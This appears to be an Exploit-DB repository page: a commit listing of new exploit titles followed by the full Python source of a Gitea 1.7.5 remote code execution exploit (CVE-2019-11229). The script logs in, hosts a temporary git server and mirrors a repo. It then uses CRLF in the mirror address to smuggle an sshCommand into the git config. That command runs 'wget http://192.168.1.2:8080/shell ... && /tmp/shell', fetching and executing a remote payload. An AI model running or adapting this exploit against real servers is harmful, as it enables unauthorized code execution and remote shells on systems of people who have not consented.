e95d9f2c13
23 changes to exploits/shellcodes dirsearch 0.4.1 - CSV Injection IObit Uninstaller 10 Pro - Unquoted Service Path WinAVR Version 20100110 - Insecure Folder Permissions PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation H2 Database 1.4.199 - JNI Code Execution Responsive ELearning System 1.0 - 'id' Sql Injection Responsive E-Learning System 1.0 - 'id' Sql Injection Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF) IPeakCMS 3.5 - Boolean-based blind SQLi Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting WordPress Plugin litespeed cache 3.6 - 'server_ip' Cross-Site Scripting Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE Responsive E-Learning System 1.0 - Stored Cross Site Scripting WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting Newgen Correspondence Management System (corms) eGov 12.0 - IDOR Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated) Resumes Management and Job Application Website 1.0 - Multiple Stored XSS Gitea 1.7.5 - Remote Code Execution Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
126 lines
No EOL
6.6 KiB
Python
Executable file
126 lines
No EOL
6.6 KiB
Python
Executable file
# Exploit Title: Gitea 1.7.5 - Remote Code Execution
|
|
# Date: 2020-05-11
|
|
# Exploit Author: 1F98D
|
|
# Original Author: LoRexxar
|
|
# Software Link: https://gitea.io/en-us/
|
|
# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3
|
|
# Tested on: Debian 9.11 (x64)
|
|
# CVE: CVE-2019-11229
|
|
# References:
|
|
# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa
|
|
#
|
|
# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings,
|
|
# leading to authenticated remote code execution.
|
|
#
|
|
#!/usr/bin/python3
|
|
|
|
import re
|
|
import os
|
|
import sys
|
|
import random
|
|
import string
|
|
import requests
|
|
import tempfile
|
|
import threading
|
|
import http.server
|
|
import socketserver
|
|
import urllib.parse
|
|
from functools import partial
|
|
|
|
USERNAME = "test"
|
|
PASSWORD = "password123"
|
|
HOST_ADDR = '192.168.1.1'
|
|
HOST_PORT = 3000
|
|
URL = 'http://192.168.1.2:3000'
|
|
CMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'
|
|
|
|
# Login
|
|
s = requests.Session()
|
|
print('Logging in')
|
|
body = {
|
|
'user_name': USERNAME,
|
|
'password': PASSWORD
|
|
}
|
|
r = s.post(URL + '/user/login',data=body)
|
|
if r.status_code != 200:
|
|
print('Login unsuccessful')
|
|
|
|
sys.exit(1)
|
|
print('Logged in successfully')
|
|
|
|
# Obtain user ID for future requests
|
|
print('Retrieving user ID')
|
|
r = s.get(URL + '/')
|
|
if r.status_code != 200:
|
|
print('Could not retrieve user ID')
|
|
sys.exit(1)
|
|
|
|
m = re.compile("<meta name=\"_uid\" content=\"(.+)\" />").search(r.text)
|
|
USER_ID = m.group(1)
|
|
print('Retrieved user ID: {}'.format(USER_ID))
|
|
|
|
# Hosting the repository to clone
|
|
gitTemp = tempfile.mkdtemp()
|
|
os.system('cd {} && git init'.format(gitTemp))
|
|
os.system('cd {} && git config user.email x@x.com && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp))
|
|
os.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp))
|
|
os.system('cd {}.git && git update-server-info'.format(gitTemp))
|
|
handler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp')
|
|
socketserver.TCPServer.allow_reuse_address = True
|
|
httpd = socketserver.TCPServer(("", HOST_PORT), handler)
|
|
t = threading.Thread(target=httpd.serve_forever)
|
|
t.start()
|
|
print('Created temporary git server to host {}.git'.format(gitTemp))
|
|
|
|
# Create the repository
|
|
print('Creating repository')
|
|
REPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
|
|
body = {
|
|
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
|
|
'uid': USER_ID,
|
|
'repo_name': REPO_NAME,
|
|
'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]),
|
|
'mirror': 'on'
|
|
}
|
|
r = s.post(URL + '/repo/migrate', data=body)
|
|
if r.status_code != 200:
|
|
print('Error creating repo')
|
|
httpd.shutdown()
|
|
t.join()
|
|
sys.exit(1)
|
|
print('Repo "{}" created'.format(REPO_NAME))
|
|
|
|
# Inject command into config file
|
|
print('Injecting command into repo')
|
|
body = {
|
|
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
|
|
'mirror_address': 'ssh://example.com/x/x"""\r\n[core]\r\nsshCommand="{}"\r\na="""'.format(CMD),
|
|
'action': 'mirror',
|
|
'enable_prune': 'on',
|
|
'interval': '8h0m0s'
|
|
}
|
|
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
|
|
if r.status_code != 200:
|
|
print('Error injecting command')
|
|
httpd.shutdown()
|
|
t.join()
|
|
sys.exit(1)
|
|
print('Command injected')
|
|
|
|
# Trigger the command
|
|
print('Triggering command')
|
|
body = {
|
|
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
|
|
'action': 'mirror-sync'
|
|
}
|
|
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
|
|
if r.status_code != 200:
|
|
print('Error triggering command')
|
|
httpd.shutdown()
|
|
t.join()
|
|
sys.exit(1)
|
|
|
|
print('Command triggered')
|
|
|
|
# Shutdown the git server
|
|
httpd.shutdown() |